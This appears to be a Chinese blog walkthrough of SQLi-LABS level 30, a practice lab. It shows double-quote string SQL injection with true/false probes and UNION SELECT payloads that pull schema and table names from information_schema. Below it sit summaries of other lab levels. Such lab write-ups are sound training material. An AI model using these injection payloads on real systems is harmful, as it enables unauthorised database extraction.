SQLi LABS Less-30

简介: 第30关使用GET请求传递参数,在url中构造payload即可后端源码中并没有做什么过滤,只是在参数两边添加了双引号

第30关使用GET请求传递参数,在url中构造payload即可


后端源码中并没有做什么过滤,只是在参数两边添加了双引号


image.png输入 1" and true-- a,页面正常显示


image.png


输入 1" and false-- a,页面空显示


image.png


由此可证明存在SQL注入,注入点为双引号字符型注入

页面中有显示位,可以使用联合注入进行脱库

1. -1" union select 1,2,
2. (select group_concat(schema_name) from information_schema.schemata)
3. -- a

image.png

脱表

1. -1" union select 1,2,
2. (select group_concat(table_name) from information_schema.tables
3. where table_schema='security')
4. -- a

image.png


相关文章
|
SQL 安全 数据库
SQLi LABS Less-14
第十四关请求方式为 POST请求 , 注入点为 双引号字符串型 , 注入方式为 报错注入 本次报错注入使用 updatexml()
160 0
SQLi LABS Less-14
|
数据库
SQLi LABS Less-15
第十五关请求方式为POST请求 , 注入方式为 单引号字符串型注入 第一步,判断注入类型 使用万能账号测试注入类
288 0
SQLi LABS Less-15
SQLi LABS Less-27
第27关使用GET请求传递参数,在url中构造payload即可 源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则
358 0
SQLi LABS Less-27
|
SQL 安全 数据库
sqli-labs Less-1
1.首先来到less-1 1.png 2.png 2.请以数字值作为参数输入id。 url后面输入?id=1 3.png 大家可能此时与我不同的是 your sql statement is SELECT * FROM users WHERE id='1' LIMIT 0,1 这是为了方便我们自己看到底执行的sql语句是什么显示出来的。
1198 0
|
SQL 安全 数据库
SQLi-LABS Less-3
第三关请求方式为 GET请求 , 注入点为 单引号+括号的字符型注入 , 注入方式为 联合注入 第一步,判断输入方式
171 0
SQLi-LABS Less-3
SQLi LABS Less-31
第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号
161 0
SQLi LABS Less-31
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-16
第16关使用POST请求提交参数,可以使用代理工具抓包或直接在输入框中修改参数 后端代码根据用户输入账号和密码去数据库中查询,查询成功则返回登录成功,否则返回登录失败,页面没有显示的数据,SQL语句中使用了错误抑制符@来限制数据库的报错信息,因此不能使用联合注入或报错注入,推荐使用布尔盲注,源码如下
160 0
SQLi LABS Less-16
|
数据库 数据安全/隐私保护
SQLi LABS Less-19
第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下
193 0
SQLi LABS Less-19
|
SQL 数据库
SQLi LABS Less-26a
第26a关使用GET请求传递参数,在url地址栏中构造payload即可 源码中过滤了参数中的or,and,/*,--,#,空格,斜线,我们想办法绕过即可
338 0
SQLi LABS Less-26a
|
9月前
|
安全 数据库 数据安全/隐私保护
sqli-labs第一关
sqli-labs第一关

热门文章

最新文章